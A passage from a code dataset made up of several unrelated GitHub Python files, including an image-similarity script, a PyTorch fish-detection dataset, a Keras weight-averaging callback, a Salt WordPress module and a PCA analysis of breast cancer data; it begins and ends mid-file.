(word text_page ID_image ID, word vector + image vector)\nfor w_key in word_dict.keys():\n p_id_list = word_dict[w_key]\n word_vec = word_vecs_dict[w_key]\n for p_id in p_id_list:\n #Get the image id with the page ID of the page containing the word 'w_key' and combine the word and image vectors\n for i_key in [key for key in img_vecs_dict.keys() if p_id == int(key.split('_')[0])]:\n img_vec = img_vecs_dict[i_key]\n c_key = w_key + '_' + i_key\n c_vec = np.hstack([word_vec,img_vec])\n word_img_list.append((c_key,c_vec)) \n\n#Serialize the result and store it in a file\nwith open(word_img_vecs_file, 'wb') as f:\n pickle.dump({'word_img_vecs':word_img_list},f)\n\n\n","repo_name":"yuhtangit/cvmwp","sub_path":"combine_vecs.py","file_name":"combine_vecs.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72632259772","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# detect_similar_images.py\n# Author: Jim Andress\n# Created: 2020-12-29\n\n\nimport argparse\nimport os\nimport pandas as pd\nfrom scipy.spatial.distance import cdist\n\nfrom similar_photo_comparisons.constants import EMBEDDING_DIRECTORY, EMBEDDINGS_FILENAME, SIMILAR_IMAGES_DIRECTORY, SIMILAR_IMAGES_FILENAME\nfrom similar_photo_comparisons.utils import get_categories\n\n\ndef get_similar_images(dataset_dir, cat1, cat2, metric, cutoff):\n cat1_embeds_df = pd.read_csv(os.path.join(dataset_dir, EMBEDDING_DIRECTORY, cat1, EMBEDDINGS_FILENAME), index_col=0)\n cat2_embeds_df = pd.read_csv(os.path.join(dataset_dir, EMBEDDING_DIRECTORY, cat2, EMBEDDINGS_FILENAME), index_col=0)\n\n dists = cdist(cat1_embeds_df.values, cat2_embeds_df.values, metric=metric)\n dists_df = pd.DataFrame(dists, columns=cat2_embeds_df.index, index=cat1_embeds_df.index).reset_index().rename(columns={'index': 'cat1_filepath'})\n\n dists_df = pd.melt(dists_df, id_vars=['cat1_filepath'], value_vars=cat2_embeds_df.index, var_name='cat2_filepath', value_name='distance')\n dists_df['cat1'] = cat1\n dists_df['cat2'] = cat2\n return dists_df[dists_df.distance <= cutoff]\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Finds similar image pairs\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument(\"--dataset_directory\", type=str, required=True,\n help=\"Path to the directory where the dataset is saved\")\n parser.add_argument(\"--max_distance\", type=float, required=False, default=5.0,\n help=\"The cutoff above which images are not similar\")\n parser.add_argument(\"--dist_metric\", type=str, required=False, default='euclidean',\n help=\"The distance metric used to compute similar images\")\n\n args = parser.parse_args()\n\n dataset_dir = args.dataset_directory\n\n categories = get_categories(dataset_dir)\n\n print(f'Found categories: {categories}')\n\n os.makedirs(os.path.join(dataset_dir, SIMILAR_IMAGES_DIRECTORY), exist_ok=True)\n\n for cat1 in categories:\n for cat2 in categories:\n if cat1 >= cat2:\n continue\n\n print(f'Computing similar images for categories {cat1} and {cat2}')\n similar_imgs_df = get_similar_images(dataset_dir, cat1, cat2, args.dist_metric, args.max_distance)\n similar_imgs_df.to_csv(os.path.join(dataset_dir, SIMILAR_IMAGES_DIRECTORY, f'{SIMILAR_IMAGES_FILENAME}_{cat1}_{cat2}.csv'), index=False)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jandress94/similar_photo_comparisons","sub_path":"similar_photo_comparisons/similarity_detection/detect_similar_images.py","file_name":"detect_similar_images.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21842659408","text":"import os\nimport numpy as np\nimport random\nimport json\n\n# CV\nimport cv2\n\n# Pytorch\nimport torch\nfrom torch.utils.data import Dataset\n\n# Albumenatations\nimport albumentations as A\nfrom albumentations.pytorch.transforms import ToTensorV2\n\nimport sys\nsys.path.append('/workspaces/SchoolOfFishDetection_Pytorch/develop/')\nimport utils.transforms.transforms_alb as MT\n\nclasses = {\n 'Breezer School': 0,\n 'Jumper School': 1,\n 'Dolphin': 2,\n 'Bird': 3,\n 'Object': 4,\n 'Cloud': 5,\n 'Ripple': 6,\n 'Smooth Surface': 7,\n 'Wake': 8,\n 'Each Fish': 9,\n 'w': 10,\n}\n\n\nclass SchoolOfFishDataset(Dataset):\n def __init__(self, img_dir, ann_dir, ids, transforms=None):\n self.img_dir = img_dir\n self.ann_dir = ann_dir\n self.ids = ids\n\n self.imgs = list(sorted(os.listdir(self.img_dir)))\n self.anns = list(sorted(os.listdir(self.ann_dir)))\n self.transforms = transforms\n\n def __len__(self) -> int:\n return self.ids.shape[0]\n\n def __getitem__(self, index):\n idx = self.ids[index]\n\n # load images and annotations\n img_path = os.path.join(self.img_dir, self.imgs[idx])\n ann_path = os.path.join(self.ann_dir, self.anns[idx])\n\n img = cv2.imread(img_path, cv2.IMREAD_COLOR)\n img = cv2.cvtColor(img, cv2.COLOR_BGRA2RGB).astype(np.float32)\n img /= 255.0\n h, w, _ = img.shape # (h,w,c)\n\n # DETR takes in data in yolo format\n boxes = []\n labels = []\n with open(ann_path) as f:\n df = json.load(f)\n for k, v in df['labels'].items():\n boxes.extend(v)\n labels.extend([k] * len(v))\n\n boxes = np.array(boxes, dtype=np.float32)\n\n # Area of bb\n area = boxes[:, 2] * boxes[:, 3]\n area = torch.as_tensor(area, dtype=torch.float32)\n\n boxes[:, 0::2].clip(min=0, max=w)\n boxes[:, 1::2].clip(min=0, max=h)\n\n try:\n labels = [classes[x] for x in labels]\n except KeyError:\n print('No such key.\\n' + f'nanno_file:{self.anns[idx]}')\n\n labels = np.array(labels, dtype=np.int32)\n\n if self.transforms:\n sample = {\n 'image': img,\n 'bboxes': boxes,\n 'labels': labels\n }\n sample = self.transforms(**sample)\n img = sample['image']\n boxes = sample['bboxes']\n labels = sample['labels']\n\n __, h, w = img.shape # (c, h, w)\n\n target = {}\n target['boxes'] = torch.as_tensor(boxes, dtype=torch.float32)\n target['labels'] = torch.as_tensor(labels, dtype=torch.long)\n target['image_id'] = torch.tensor([idx])\n # target['area'] = area\n\n return img, target, idx\n\n\nclass SchoolOfFishTestDataset(Dataset):\n\n def __init__(self, dataframe, image_dir, transforms=None):\n super().__init__()\n\n self.image_ids = dataframe['image_id'].unique()\n self.df = dataframe\n self.image_dir = image_dir\n self.transforms = transforms\n\n def __getitem__(self, index: int):\n\n image_id = self.image_ids[index]\n # records = self.df[self.df['image_id'] == image_id]\n\n image = cv2.imread(\n f'{self.image_dir}/{image_id}.jpg',\n cv2.IMREAD_COLOR)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB).astype(np.float32)\n image /= 255.0\n\n if self.transforms:\n sample = {\n 'image': image,\n }\n sample = self.transforms(**sample)\n image = sample['image']\n\n return image, image_id\n\n def __len__(self) -> int:\n return self.image_ids.shape[0]\n\n\ndef get_train_transforms():\n return A.Compose(\n [\n A.OneOf(\n [\n A.HueSaturationValue(hue_shift_limit=0.2,\n sat_shift_limit=0.2,\n val_shift_limit=0.2,\n p=0.9),\n A.RandomBrightnessContrast(brightness_limit=0.2,\n contrast_limit=0.2,\n p=0.9)\n ],\n p=0.9\n ),\n A.ToGray(p=0.01),\n A.HorizontalFlip(p=0.5), # ng\n A.VerticalFlip(p=0.5), # ng\n A.Resize(height=512, width=512, p=1), # ng\n A.Cutout(\n num_holes=8,\n max_h_size=64,\n max_w_size=64,\n fill_value=0,\n p=0.5),\n ToTensorV2(p=1.0)\n ],\n p=1.0,\n bbox_params=A.BboxParams(\n format='pascal_voc',\n min_area=0,\n min_visibility=0,\n label_fields=['labels'])\n )\n\n\ndef get_train_transforms_v2():\n return A.Compose(\n [\n A.OneOf(\n [\n # 色相\n A.HueSaturationValue(hue_shift_limit=0.2,\n sat_shift_limit=0.2,\n val_shift_limit=0.2,\n p=0.3),\n # 明るさとコントラスト\n A.RandomBrightnessContrast(brightness_limit=0.2,\n contrast_limit=0.2,\n p=0.3),\n # RGBの各チャンネル\n A.RGBShift(r_shift_limit=20 / 255,\n g_shift_limit=20 / 255,\n b_shift_limit=10 / 255,\n p=0.3),\n ],\n p=0.2\n ),\n A.OneOf(\n [\n # ガンマ変換\n A.RandomGamma(gamma_limit=(80, 120), p=0.3),\n # ぼかし\n A.Blur(p=0.6),\n # シャープネス\n A.IAASharpen(p=0.6),\n # ガウスノイズ\n A.GaussNoise(var_limit=(0.01, 0.05), mean=0, p=0.05),\n # グレースケール\n A.ToGray(p=0.05)\n ],\n p=0.2\n ),\n A.OneOf(\n [\n # 水平に反転\n A.HorizontalFlip(p=1),\n # 垂直に反転\n A.VerticalFlip(p=1),\n # 転置\n A.Transpose(p=1),\n # 90°単位で回転\n A.RandomRotate90(p=1)\n ],\n p=1\n ),\n # 霧をシミュレート\n A.RandomFog(fog_coef_lower=0.1, fog_coef_upper=0.2, p=0.05),\n # リサイズ\n A.Resize(height=512, width=512, p=1),\n # 矩形領域の粗いDropout\n A.Cutout(num_holes=random.randint(1, 6),\n max_h_size=64,\n max_w_size=64,\n fill_value=0,\n p=0.15),\n # torch tensor\n ToTensorV2(p=5.0),\n ],\n p=1.0,\n bbox_params=A.BboxParams(format='pascal_voc',\n min_area=0,\n min_visibility=0,\n label_fields=['labels'])\n )\n\n\ndef get_train_transforms_detr():\n scales = [480, 512, 544, 576, 608, 640, 672, 704, 736, 768, 800]\n\n return A.Compose(\n [\n # 水平に反転\n A.HorizontalFlip(p=0.5),\n A.OneOf([\n MT.CustomRandomResize(scales, max_size=1333, p=0.5),\n A.Compose(\n [\n MT.CustomRandomResize([400, 500, 600]),\n MT.CustomRandomSizedCrop(384, 600),\n MT.CustomRandomResize(scales, max_size=1333)\n ],\n p=0.5\n )\n ]),\n A.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225],\n max_pixel_value=1),\n ToTensorV2(),\n ],\n p=1.0,\n bbox_params=A.BboxParams(format='pascal_voc',\n min_area=0,\n min_visibility=0,\n label_fields=['labels'])\n )\n\n\ndef get_valid_transforms():\n return A.Compose([A.Resize(height=512,\n width=512,\n p=1.0),\n ToTensorV2(p=1.0)],\n p=1.0,\n bbox_params=A.BboxParams(format='pascal_voc',\n min_area=0,\n min_visibility=0,\n label_fields=['labels']))\n\n\ndef get_valid_transforms_detr():\n return A.Compose(\n [\n MT.CustomRandomResize([800], max_size=1333),\n A.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225],\n max_pixel_value=1),\n ToTensorV2(),\n ],\n p=1.0,\n bbox_params=A.BboxParams(format='pascal_voc',\n min_area=0,\n min_visibility=0,\n label_fields=['labels'])\n )\n\n\ndef get_test_transform():\n return A.Compose([A.Resize(height=512,\n width=512,\n p=1.0),\n ToTensorV2(p=1.0)],\n p=1.0\n )\n","repo_name":"kkkkkevin/Pytorch_Utils","sub_path":"custom_datasets/schooloffish_dataset.py","file_name":"schooloffish_dataset.py","file_ext":"py","file_size_in_byte":9708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17035112931","text":"from typing import List\n\n\nclass Solution:\n def partition(self, s: str) -> List[List[str]]:\n len_ = len(s)\n dp = [[0] * len_ for _ in range(len_)] # 预处理动态规划求回文串-重要!\n for i in range(len_):\n dp[i][i] = 1\n for k in range(1, len_):\n for i in range(len(s) - k):\n if k == 1:\n dp[i][i + k] = s[i] == s[i + k]\n else:\n dp[i][i + k] = dp[i + 1][i + k - 1] if s[i] == s[i + k] else 0\n ans = []\n\n def digui(begin, len_, temp): # 回溯\n if begin == len_:\n ans.append(temp.copy())\n return\n for i in range(begin, len_):\n if dp[begin][i] == 1:\n temp.append(s[begin:i + 1])\n digui(i + 1, len_, temp)\n temp.pop()\n\n digui(0, len_, [])\n return ans\n","repo_name":"ZZHbible/leetcode","sub_path":"leetcode131-分割回文串-重要!!.py","file_name":"leetcode131-分割回文串-重要!!.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36845768568","text":"import time\nfrom turtle import Screen\nfrom ball import Ball\nfrom paddle import Paddle\nfrom score import Scoreboard\n\nR_COORDINATES = (350,0)\nL_COORDINATES = (-350,0)\n\nscreen = Screen()\n\nscreen.setup(800,600)\nscreen.bgcolor(\"black\")\nscreen.title(\"Ping Pong\")\nscreen.tracer(0)\n\nl_paddle = Paddle(L_COORDINATES)\nr_paddle = Paddle(R_COORDINATES)\nball = Ball()\nscore = Scoreboard()\n\nscreen.listen()\nscreen.onkey(l_paddle.move_up, \"w\")\nscreen.onkey(l_paddle.move_down, \"s\")\nscreen.onkey(r_paddle.move_up, \"i\")\nscreen.onkey(r_paddle.move_down, \"k\")\n\ngame_is_on = True\nwhile game_is_on:\n time.sleep(ball.move_speed)\n screen.update()\n ball.move()\n\n #Detect collision with wall\n if ball.ycor() > 280 or ball.ycor() < -280:\n ball.bounce_y()\n\n #Detect collision with paddle\n if ball.distance(r_paddle) < 50 and ball.xcor() > 320 or ball.distance(l_paddle) < 50 and ball.xcor() < -320:\n ball.bounce_x()\n\n #Detect when paddle misses\n if ball.xcor() > 380:\n ball.restart()\n score.l_point()\n\n if ball.xcor() < -380:\n ball.restart()\n score.r_point()\n\nscreen.exitonclick()","repo_name":"Chescore/Python_Projects","sub_path":" 22 - Ping Pong/ping_pong.py","file_name":"ping_pong.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15581767932","text":"# third party\nfrom scipy import io\n\n\ndef load_dataset() -> None:\n FILEPATH = \"data/hs_bearing_1/hs_bearing_1/sensor-20130307T015746Z.mat\"\n # var = h5py.File(FILEPATH, \"r\")\n var = io.loadmat(FILEPATH)\n for key, item in var.items():\n print(key, item)\n\n\nif __name__ == \"__main__\":\n load_dataset()\n","repo_name":"iimuz/til","sub_path":"machine_learning/wind_turbine_high_speed_bearing_prognosis/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"22540604124","text":"#!/usr/bin/env python\n# pylint:disable=missing-docstring\nfrom contextlib import suppress\n\nfrom ray.rllib.rollout import create_parser, run\n\nimport raylab\n\n\ndef main():\n raylab.register_all_agents()\n raylab.register_all_environments()\n with suppress(KeyboardInterrupt):\n parser = create_parser()\n args = parser.parse_args()\n run(args, parser)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"0xangelo/raylab","sub_path":"scripts/rollout.py","file_name":"rollout.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"78"} +{"seq_id":"72186037692","text":"from oit.support.core import Scenarios, Scenario\n\n\nclass GenericClassFactory:\n @staticmethod\n def create(className, properties):\n TestClass = GenericClassFactory.__createInstance(className)\n # create the instance before setting attributes to overwrite defaults\n testInstance = TestClass()\n\n # set test class attributes\n for property in properties:\n setattr(testInstance, property, properties[property])\n\n testInstance.prepare()\n\n return testInstance\n\n @staticmethod\n def __createInstance(className):\n parts = className.split('.')\n module = \".\".join(parts[:-1])\n m = __import__(module)\n for comp in parts[1:]:\n m = getattr(m, comp)\n return m\n\n\nclass ScenariosFactoryParser():\n requestCommandBuilder = None\n\n @staticmethod\n def parse(scenariosData):\n scenarios = Scenarios()\n for scenario in scenariosData:\n ScenariosFactoryParser.ScenarioParser.parse(scenarios, scenariosData[scenario])\n return scenarios\n\n class TestsParser:\n @staticmethod\n def parse(scenario, testsData):\n for package in testsData:\n for testClass in testsData[package]:\n for key in testClass.keys():\n className = \"oit.scenarios.%s.%s\" % (package, key)\n test = GenericClassFactory.create(className, testClass[key])\n test.setRequestCommandBuilder(ScenariosFactoryParser.requestCommandBuilder)\n scenario.addTest(test)\n\n class ScenarioParser():\n @staticmethod\n def parse(scenarios, scenarioData):\n scenario = Scenario(scenarioData['name'])\n ScenariosFactoryParser.TestsParser.parse(scenario, scenarioData['tests'])\n scenarios.addScenario(scenario)\n return scenario\n\n","repo_name":"obiba/opal-integration-tests","sub_path":"src/main/python/oit/support/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38233429414","text":"import argparse\nimport time\n\nfrom kleio.core.cli.base import get_trial_from_short_id\nfrom kleio.core.trial.base import Trial\nfrom kleio.core.io.trial_builder import TrialBuilder\nfrom kleio.core.evc.trial_node import TrialNode\nfrom kleio.core.wrapper import Consumer\n\n\nSUSPENSION_FAILED = \"\"\"\nError: Trial {trial.short_id} stopped for another reason and now has status '{trial.status}'\n\ntail stdout:\n{stdout}\n\ntail stderr:\n{stderr}\n\nFor a complete log of the trial use command\n$ kleio cat {trial.short_id}\n\"\"\"\n\n\ndef add_subparser(parser):\n \"\"\"Return the parser that needs to be used for this command\"\"\"\n suspend_parser = parser.add_parser('suspend', help='suspend help')\n\n suspend_parser.add_argument(\n 'id', help=\"id of the trial. Can be name or hash.\")\n\n suspend_parser.set_defaults(func=main)\n\n return suspend_parser\n\n\ndef main(args):\n database = TrialBuilder().build_database(args)\n trial = TrialNode.load(get_trial_from_short_id(args, args.pop('id'))['_id'])\n\n requested = False\n while not requested:\n try:\n trial.suspend()\n requested = True\n except RuntimeError as e:\n if \"Trial status changed meanwhile.\" not in str(e):\n raise\n\n trial.update()\n\n trial.save()\n print(\"Request to suspend Trial {trial.short_id} has been registered\".format(trial=trial))\n print(\"Waiting for confirmation...\")\n\n suspended = False\n while not suspended:\n document = database.read(Trial.trial_report_collection, {'_id': trial.id}, {'registry.status': 1})[0]\n suspended = document['registry']['status'] == \"suspended\"\n\n if not suspended and document['registry']['status'] not in status.INTERRUPTABLE:\n print(SUSPENSION_FAILED.format(\n trial=trial, stdout=trial.stdout[-10:], stderr=trial.stderr[-10:]))\n\n print(\"Trial {trial.short_id} suspended successfully\".format(trial=trial))\n","repo_name":"Epistimio/kleio","sub_path":"src/kleio/core/cli/suspend.py","file_name":"suspend.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"4851543407","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\npaper implementaton:\nStochastic Weight Averaging: https://arxiv.org/abs/1803.05407\n\n\"\"\"\n\nimport keras as K\n\n\nclass SWA(K.callbacks.Callback):\n\n def __init__(self, filepath, SWA_START):\n super(SWA, self).__init__()\n self.filepath = filepath\n self.SWA_START = SWA_START\n\n def on_train_begin(self, logs=None):\n self.nb_epoch = self.params['epochs']\n print('Stochastic weight averaging selected for last {} epochs.'\n .format(self.nb_epoch - self.SWA_START))\n\n def on_epoch_begin(self, epoch, logs=None):\n lr = float(K.backend.get_value(self.model.optimizer.lr))\n print('learning rate of current epoch is : {}'.format(lr))\n\n def on_epoch_end(self, epoch, logs=None):\n if epoch == self.SWA_START:\n self.swa_weights = self.model.get_weights()\n\n elif epoch > self.SWA_START:\n for i, layer in enumerate(self.model.layers):\n self.swa_weights[i] = (self.swa_weights[i] *\n (epoch - self.SWA_START) + self.model.get_weights()[i]) / (\n (epoch - self.SWA_START) + 1)\n else:\n pass\n\n def on_train_end(self, logs=None):\n self.model.set_weights(self.swa_weights)\n print('set stochastic weight average as final model parameters [FINISH].')\n # self.model.save_weights(self.filepath)\n # print('save final stochastic averaged weights model to file [FINISH].')\n \n \nclass LearningRateDisplay(K.callbacks.Callback):\n def on_epoch_begin(self, epoch, logs=None):\n lr = float(K.backend.get_value(self.model.optimizer.lr))\n print('learning rate of current epoch is : {}'.format(lr))","repo_name":"Fieldhunter/2020-ZhanJiang-Underwater-Object-Detection-Algorithm-Contest","sub_path":"swa.py","file_name":"swa.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"12847872444","text":"\"\"\"\nThis module is used to manage Wordpress installations\n\n:depends: wp binary from http://wp-cli.org/\n\"\"\"\n\n# Import Python Modules\n\nimport collections\n\n# Import Salt Modules\nimport salt.utils.path\n\nPlugin = collections.namedtuple(\"Plugin\", \"name status update versino\")\n\n\ndef __virtual__():\n if salt.utils.path.which(\"wp\"):\n return True\n return (False, \"Missing dependency: wp\")\n\n\ndef _get_plugins(stuff):\n return Plugin(stuff)\n\n\ndef list_plugins(path, user):\n \"\"\"\n List plugins in an installed wordpress path\n\n path\n path to wordpress install location\n\n user\n user to run the command as\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' wordpress.list_plugins /var/www/html apache\n \"\"\"\n ret = []\n resp = __salt__[\"cmd.shell\"](\"wp --path={} plugin list\".format(path), runas=user)\n for line in resp.split(\"\\n\")[1:]:\n ret.append(line.split(\"\\t\"))\n return [plugin.__dict__ for plugin in map(_get_plugins, ret)]\n\n\ndef show_plugin(name, path, user):\n \"\"\"\n Show a plugin in a wordpress install and check if it is installed\n\n name\n Wordpress plugin name\n\n path\n path to wordpress install location\n\n user\n user to run the command as\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' wordpress.show_plugin HyperDB /var/www/html apache\n \"\"\"\n ret = {\"name\": name}\n resp = __salt__[\"cmd.shell\"](\n \"wp --path={} plugin status {}\".format(path, name), runas=user\n ).split(\"\\n\")\n for line in resp:\n if \"Status\" in line:\n ret[\"status\"] = line.split(\" \")[-1].lower()\n elif \"Version\" in line:\n ret[\"version\"] = line.split(\" \")[-1].lower()\n return ret\n\n\ndef activate(name, path, user):\n \"\"\"\n Activate a wordpress plugin\n\n name\n Wordpress plugin name\n\n path\n path to wordpress install location\n\n user\n user to run the command as\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' wordpress.activate HyperDB /var/www/html apache\n \"\"\"\n check = show_plugin(name, path, user)\n if check[\"status\"] == \"active\":\n # already active\n return None\n resp = __salt__[\"cmd.shell\"](\n \"wp --path={} plugin activate {}\".format(path, name), runas=user\n )\n if \"Success\" in resp:\n return True\n elif show_plugin(name, path, user)[\"status\"] == \"active\":\n return True\n return False\n\n\ndef deactivate(name, path, user):\n \"\"\"\n Deactivate a wordpress plugin\n\n name\n Wordpress plugin name\n\n path\n path to wordpress install location\n\n user\n user to run the command as\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' wordpress.deactivate HyperDB /var/www/html apache\n \"\"\"\n check = show_plugin(name, path, user)\n if check[\"status\"] == \"inactive\":\n # already inactive\n return None\n resp = __salt__[\"cmd.shell\"](\n \"wp --path={} plugin deactivate {}\".format(path, name), runas=user\n )\n if \"Success\" in resp:\n return True\n elif show_plugin(name, path, user)[\"status\"] == \"inactive\":\n return True\n return False\n\n\ndef is_installed(path, user=None):\n \"\"\"\n Check if wordpress is installed and setup\n\n path\n path to wordpress install location\n\n user\n user to run the command as\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' wordpress.is_installed /var/www/html apache\n \"\"\"\n retcode = __salt__[\"cmd.retcode\"](\n \"wp --path={} core is-installed\".format(path), runas=user\n )\n if retcode == 0:\n return True\n return False\n\n\ndef install(path, user, admin_user, admin_password, admin_email, title, url):\n \"\"\"\n Run the initial setup functions for a wordpress install\n\n path\n path to wordpress install location\n\n user\n user to run the command as\n\n admin_user\n Username for the Administrative user for the wordpress install\n\n admin_password\n Initial Password for the Administrative user for the wordpress install\n\n admin_email\n Email for the Administrative user for the wordpress install\n\n title\n Title of the wordpress website for the wordpress install\n\n url\n Url for the wordpress install\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' wordpress.install /var/www/html apache dwallace password123 \\\n dwallace@example.com \"Daniel's Awesome Blog\" https://blog.dwallace.com\n \"\"\"\n retcode = __salt__[\"cmd.retcode\"](\n 'wp --path={} core install --title=\"{}\" --admin_user={} '\n \"--admin_password='{}' --admin_email={} --url={}\".format(\n path, title, admin_user, admin_password, admin_email, url\n ),\n runas=user,\n )\n\n if retcode == 0:\n return True\n return False\n","repo_name":"saltstack/salt","sub_path":"salt/modules/wordpress.py","file_name":"wordpress.py","file_ext":"py","file_size_in_byte":4818,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"14410186722","text":"# -*- coding: utf-8 -*-\n\nfrom setuptools import setup, find_packages\n\n\nwith open('README.rst') as f:\n readme = f.read()\n\nsetup(\n name='scrabble_challenge',\n version='0.1.0',\n description='Scrabble coding challenge. Tells you the best Scrabble words given a particular Scrabble rack.',\n long_description=readme,\n author='Keith Johnson',\n author_email='kjohnson0451@gmail.com',\n url='https://github.com/kjohnson0451/scrabble-challenge',\n packages=find_packages(exclude=('tests', 'docs'))\n)\n\n","repo_name":"kjohnson0451/scrabble-challenge","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7330426895","text":"\"\"\"Principal Component Analysis\"\"\"\n\nimport pandas as pd\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndf1=pd.read_excel(\"breast-cancer-wisconsin.xlsx\")\ndf1=df1.fillna(df1.mean()) #replace the NaN with the mean of the column\npca_var_list=[]\n\npca = PCA()\npca.fit(df1.drop([\"code\",\"class\"],axis=1)) #remove the 'code' and 'class' columns when fitting\nfor i in range(len(pca.explained_variance_ratio_)):\n if i==0:\n pca_var_list.append(pca.explained_variance_ratio_[0])\n else: pca_var_list.append(pca_var_list[i-1]+pca.explained_variance_ratio_[i])\n\nplt.plot([1,2,3,4,5,6,7,8,9], pca_var_list, '-o',color='r',alpha=0.7,markeredgewidth=0.0)\nplt.ylabel(\"Fraction of variance explained\")\nplt.xlabel(\"First n components\")\nplt.axhline(y=0.9, color='c', linestyle='--',alpha=0.8)\nax=plt.gca()\nax.set_ylim(0.65,1)\nplt.savefig(\"Fraction_of_variance.pdf\",dpi=100) #save the figure\n\nreduced=pca.transform(df1.drop([\"code\",\"class\"],axis=1)) #the result is a 699*9 numpy.ndarray\nreduced_df1=pd.DataFrame(reduced) #transform the numpy.ndarray to a pandas dataframe\n#print(reduced_df1)\nreduced_df1[\"class\"]=df1[\"class\"] #add the class information to each sample of the transformed matrix\ngrouped = reduced_df1.groupby('class') #group by class\n\nplt.figure() #open a new figure\n#plot the diagonal cells of the matrix\nfor i in range(5):\n ax=plt.subplot(5,5,6*i+1) #for matrix diagonal\n x = grouped.get_group(2)[i] # 2-benign\n y = grouped.get_group(4)[i] # 4-malignant\n x.plot.kde(label=\"benign\",c='r') #density plot\n y.plot.kde(label=\"malignant\",c='c')\n plt.xticks(fontsize=8)\n plt.yticks(fontsize=8) #make the y axis fontsize smaller\n plt.subplots_adjust(hspace=0.2)\n plt.subplots_adjust(wspace=0.2)\n if i==0:\n ax.set_ylabel('Density')\n else:\n ax.set_ylabel('')\n ax.set_title(\"No.{} component\".format(i+1),fontsize=10)\n ttl = ax.title\n ttl.set_position([0.5, 1.02]) # set position of the title\n plt.legend(bbox_to_anchor=(1, 1),fontsize=6) #adjust the location of the legend box\n\nfor i in range(5):\n for j in range(5):\n if i!=j: #off-diagonal cells\n plt.subplot(5, 5, i*5+j+1)\n x_2 = grouped.get_group(2)[i]\n y_2 = grouped.get_group(2)[j]\n plt.scatter(y_2, x_2, alpha=0.5, c=\"r\",s=5, edgecolors='none') #use square root to make the contrast between the size of the biggest points and smallest points not so big\n\n x_4 = grouped.get_group(4)[i]\n y_4 = grouped.get_group(4)[j]\n plt.scatter(y_4,x_4, alpha=0.5, c=\"c\",s=5,edgecolors='none') # use square root to make the contrast between the size of the biggest points and smallest points not so big\n plt.xticks(fontsize=8)\n plt.yticks(fontsize=8)\n\n plt.subplots_adjust(hspace=0.2)\n plt.subplots_adjust(wspace=0.2)\n ax=plt.gca()\n\nfig = plt.gcf() #get current figure\nfig.set_size_inches(15, 15)\nplt.savefig(\"Assignment4.pdf\",dpi=200) #save the figure\n\nid_outlier=abs(reduced_df1[3]-reduced_df1[3].mean()).idxmax() #return the index of the furthest point from the mean\nreduced_df1=reduced_df1.drop(reduced_df1.index[id_outlier]) #remove this outlier\n\ndef f_score_class(df,attri): #group the dataframe by the benign and malignant class labels and then calculates F for any given attribute (attri)\n grouped = df.groupby('class')\n grand_mean=df[attri].mean()\n mean_2=grouped[attri].mean()[2]\n mean_4=grouped[attri].mean()[4]\n var_2 = (grouped[attri].std()[2]) ** 2\n var_4 = (grouped[attri].std()[4]) ** 2\n fscore = ((mean_2 - grand_mean) ** 2 + (mean_4 - grand_mean) ** 2) / (var_2 + var_4)\n return fscore\n\nplt.figure() #open a new figure\n\nplt.subplot(121) #plot the the original PCA result\nplt.plot([1,2,3,4,5,6,7,8,9], pca_var_list, '-o',color='r',alpha=0.7,markeredgewidth=0.0)\nplt.ylabel(\"Fraction of variance explained\")\nplt.xlabel(\"First n components\")\nplt.axhline(y=0.9, color='c', linestyle='--',alpha=0.8)\nax=plt.gca()\nax.set_ylim(0.65,1)\n\ndf2=pd.DataFrame() #df2 is df1 adjusted with F scores\nfor i in df1.columns[1:10]: #skip the 'code' and 'class' columns\n f_score=f_score_class(df1,i)\n df2[i]=df1[i]*f_score\npca.fit(df2)\npca_var_list_2=[]\n\nfor i in range(len(pca.explained_variance_ratio_)):\n if i==0:\n pca_var_list_2.append(pca.explained_variance_ratio_[0])\n else: pca_var_list_2.append(pca_var_list_2[i-1]+pca.explained_variance_ratio_[i])\nplt.subplot(122) #plot the the F-score adjusted PCA 